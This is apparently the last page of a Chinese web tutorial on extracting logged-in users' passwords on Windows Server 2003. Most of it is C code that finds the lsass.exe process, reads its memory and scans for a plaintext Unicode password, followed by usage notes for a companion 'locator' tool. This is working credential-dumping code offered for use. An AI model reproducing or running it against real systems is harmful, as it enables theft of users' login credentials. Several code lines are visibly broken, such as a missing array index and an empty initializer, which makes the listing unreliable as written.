在win 2003中得到登陆用户的密码的三大妙法
  • 作者:木木
  • 时间:2022-12-24

  {

  if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)

  {

  /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In

  That Way

  */

  j = i + 7;

  for (; j < nSize; j += 2)

  {

  if (Buffer[j] > 0)

  {

  Password[Count++] = Buffer[j];

  }

  else

  {

  break;

  }

  }

  return i + 7; // One Flag To Indicate We Find The Password

  }

  }

  }

  return -1; // Well,We Fail To Find The Password,And This Always Happens

  }

  // End Search

  //------------------------------------------------------------------------------------

  // Purpose: To Get The Lsass.exe PID

  // Return Type: DWORD

  // Parameters: None

  //------------------------------------------------------------------------------------

  DWORD GetLsassPID()

  {

  HANDLE hProcessSnap;

  HANDLE hProcess = NULL;

  PROCESSENTRY32 pe32;

  DWORD PID = 0;

  hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

  if( hProcessSnap == INVALID_HANDLE_VALUE )

  {

  printf("Fail To Create Snap Shot\n");

  return 0;

  }

  pe32.dwSize = sizeof(PROCESSENTRY32);

  if( !Process32First(hProcessSnap, &pe32))

  {

  CloseHandle(hProcessSnap); // Must clean up the snapshot object!

  return 0;

  }

  do

  {

  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

  {

  PID = pe32.th32ProcessID;

  break;

  }

  }while(Process32Next( hProcessSnap, &pe32));

  CloseHandle( hProcessSnap);

  return PID;

  }

  // End GetLsassPID()

  //------------------------------------------------------------------------------------

  // Purpose: To Find The Password

  // Return Type: BOOLEAN

  // Parameters:

  // In: DWORD PID -> The Lsass.exe's PID

  //------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID)

  {

  HANDLE hProcess = NULL;

  char Buffer[5 * 1024] = ;

  DWORD ByteGet = 0;

  int Found = -1;

  hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

  if (hProcess == NULL)

  {

  printf("Fail To Open Process\n");

  return FALSE;

  }

  if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe

  {

  printf("Fail To Read Memory\n");

  CloseHandle(hProcess);

  return FALSE;

  }

  CloseHandle(hProcess);

  Found = Search(Buffer,ByteGet); // Search The Password

  if (Found >= 0) // We May Find The Password

  {

  if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not

  {

  printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);

  }

  }

  else

  {

  printf("Fail To Find The Password\n");

  }

  return TRUE;

  }

  // End FindPassword

  //------------------------------------------------------------------------------------

  // Purpose: Check If The Box Is windows 2003

  // Return Type: BOOLEAN

  // Parameters: None

  //------------------------------------------------------------------------------------

  BOOL Is2003()

  {

  OSVERSIONINFOEX osvi;

  BOOL b0sVersionInfoEx;

  ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));

  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

  if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))

  {

  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

  }

  return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);

  }

  // End Is2003()

  // End Of File

  附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

  用法:

  1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

  2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。

 3/3   首页 上一页 1 2 3
相关推荐
用户评论区